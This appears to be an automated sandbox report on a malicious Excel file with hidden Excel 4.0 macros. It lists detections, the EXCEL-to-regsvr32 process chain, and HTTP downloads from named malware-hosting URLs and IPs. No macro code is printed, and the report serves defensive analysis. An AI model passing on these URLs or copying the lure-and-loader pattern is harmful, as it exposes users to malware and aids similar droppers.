Play interactive tour

Edit tour

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Sample Name:	counter-1248368226.xls
Analysis ID:	532593
MD5:	30a0db47a66a3d3173457755bb166529
SHA1:	c852a219defe8ab726b72f8792386e35428b46dc
SHA256:	bdd97906934a97d1081e68ac8f71c98a169c4af705c17b73b69b3649df216885
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Multi AV Scanner detection for submitted file

Antivirus detection for URL or domain

Sigma detected: Microsoft Office Product Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Document exploit detected (UrlDownloadToFile)

Yara detected hidden Macro 4.0 in Excel

Yara signature match

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Document contains embedded VBA macros

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

IP address seen in connection with other malware

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2804 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

regsvr32.exe (PID: 2116 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 2920 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)

regsvr32.exe (PID: 1136 cmdline: "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx MD5: 59BCE9F07985F8A4204F4D6554CFF708)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
counter-1248368226.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x1deaa:$s1: Excel 0x1ef56:$s1: Excel 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
counter-1248368226.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\counter-1248368226.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x1deaa:$s1: Excel 0x1ef56:$s1: Excel 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\counter-1248368226.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx, ProcessId: 2116

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: counter-1248368226.xls

ReversingLabs: Detection: 40%

Antivirus detection for URL or domain

Show sources

Source: https://playsis.com.br/viderJ	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSi	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL117.	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL1BN5V/tiynh.html3W(y	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL1B.b	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qhtt	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL1BN5V/tiynh.html	Avira URL Cloud: Label: malware
Source: https://playsis.com.br/qJSL1BNt	Avira URL Cloud: Label: malware

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown	HTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.22:49169 version: TLS 1.2

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\regsvr32.exe

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 108.179.192.98:443

Source: global traffic

DNS query: name: greenflag.esp.br

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 108.179.192.98:443

Source: global traffic	HTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: greenflag.esp.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: noithat117.vnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: playsis.com.brConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Joe Sandbox View	IP Address: 162.241.2.78 162.241.2.78
Source: Joe Sandbox View	IP Address: 108.179.192.98 108.179.192.98
Source: Joe Sandbox View	IP Address: 103.28.36.171 103.28.36.171

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

Source: EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: EXCEL.EXE, 00000000.00000002.757698394.0000000005541000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: EXCEL.EXE, 00000000.00000002.757698394.0000000005541000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: EXCEL.EXE, 00000000.00000002.758868165.0000000006936000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758982507.0000000006966000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761155154.0000000007AB6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761078798.00000000071E6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: EXCEL.EXE, 00000000.00000002.758982507.0000000006966000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/drawml/2006/spreadsheetD
Source: EXCEL.EXE, 00000000.00000002.758868165.0000000006936000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: EXCEL.EXE, 00000000.00000002.761155154.0000000007AB6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.761078798.00000000071E6000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/r
Source: regsvr32.exe, 00000003.00000002.458519777.0000000003A60000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432892506.0000000003B40000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.458167043.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432455661.0000000001D40000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.486891484.0000000001DA0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.458519777.0000000003A60000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.432892506.0000000003B40000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: EXCEL.EXE, 00000000.00000002.756774289.0000000004FB7000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.459166553.0000000004A27000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433499004.0000000004C17000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: EXCEL.EXE, 00000000.00000003.412689926.0000000005699000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.412675282.0000000005697000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/
Source: EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.html
Source: EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/yuINdRbM/tiynh.htmltv7y
Source: EXCEL.EXE, 00000000.00000003.412689926.0000000005699000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.412675282.0000000005697000.00000004.00000001.sdmp	String found in binary or memory: https://greenflag.esp.br/~
Source: EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/
Source: EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.html
Source: EXCEL.EXE, 00000000.00000002.757569584.00000000054D6000.00000004.00000001.sdmp	String found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.htmlfs7y
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.boi
Source: EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL117.
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1B.b
Source: EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html117.vn/TSh7GBeIR/tiynh.htmlink
Source: EXCEL.EXE, 00000000.00000002.758475130.0000000005667000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BN5V/tiynh.html3W(y
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSL1BNt
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qJSi
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/qhtt
Source: EXCEL.EXE, 00000000.00000002.757830393.00000000055A1000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.com.br/viderJ
Source: EXCEL.EXE, 00000000.00000002.759428782.0000000006B20000.00000004.00000001.sdmp	String found in binary or memory: https://playsis.cre
Source: EXCEL.EXE, 00000000.00000002.757698394.0000000005541000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.757753405.0000000005564000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tiynh[1].htm

Jump to behavior

Source: unknown

DNS traffic detected: queries for: greenflag.esp.br

Source: global traffic	HTTP traffic detected: GET /yuINdRbM/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: greenflag.esp.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /TSh7GBeIR/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: noithat117.vnConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /qJSL1BN5V/tiynh.html HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: playsis.com.brConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 108.179.192.98:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.28.36.171:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.241.2.78:443 -> 192.168.2.22:49169 version: TLS 1.2

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4	Screenshot OCR: Enable Editing 18 19 I OK 20 (D PROTECTED VIEW Be careful - files from the lnterne -cted View. E
Source: Screenshot number: 4	Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
Source: Screenshot number: 8	Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the lnterne Ln9k _J -cted View. Enable E
Source: Screenshot number: 8	Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content If you are using a mobi
Source: Screenshot number: 12	Screenshot OCR: Enable Editing No RETURNQ or HALTQ function found on maao sheet. 18 19 I " I 20 (D PROTECTED VIE
Source: Screenshot number: 12	Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
Source: Document image extraction number: 0	Screenshot OCR: Enable Editing CD PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
Source: Document image extraction number: 0	Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content If you are using a mobi
Source: Screenshot number: 16	Screenshot OCR: Enable Editing d 18 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viru
Source: Screenshot number: 16	Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 3
Source: Screenshot number: 20	Screenshot OCR: Enable Editing 19 20 (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. U
Source: Screenshot number: 20	Screenshot OCR: Enable Content 25 26 (i) SECURITY WARNING Macros have been disabled. Enable Content 27 28 29 Z

Source: counter-1248368226.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor3
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor6
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor2
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor1
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor4
Source: counter-1248368226.xls	Macro extractor: Sheet name: Bor5

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Code function: 0_2_0219CF01

Source: counter-1248368226.xls	OLE indicator, VBA macros: true
Source: counter-1248368226.xls.0.dr	OLE indicator, VBA macros: true

Source: DAB5.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: counter-1248368226.xls

ReversingLabs: Detection: 40%

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Source: counter-1248368226.xls	OLE indicator, Workbook stream: true
Source: counter-1248368226.xls.0.dr	OLE indicator, Workbook stream: true

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\regsvr32.exe "C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx

Source: EXCEL.EXE, 00000000.00000002.756462860.0000000004DD0000.00000002.00020000.sdmp, regsvr32.exe, 00000003.00000002.458941535.0000000004840000.00000002.00020000.sdmp, regsvr32.exe, 00000004.00000002.433299064.0000000004A30000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE011.tmp

Jump to behavior

Source: classification engine

Classification label: mal80.expl.winXLS@7/4@3/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK
Source: C:\Windows\System32\regsvr32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: DAB5.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\regsvr32.exe TID: 2900	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 2728	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1936	Thread sleep count: 51 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 2520	Thread sleep time: -60000s >= -30000s

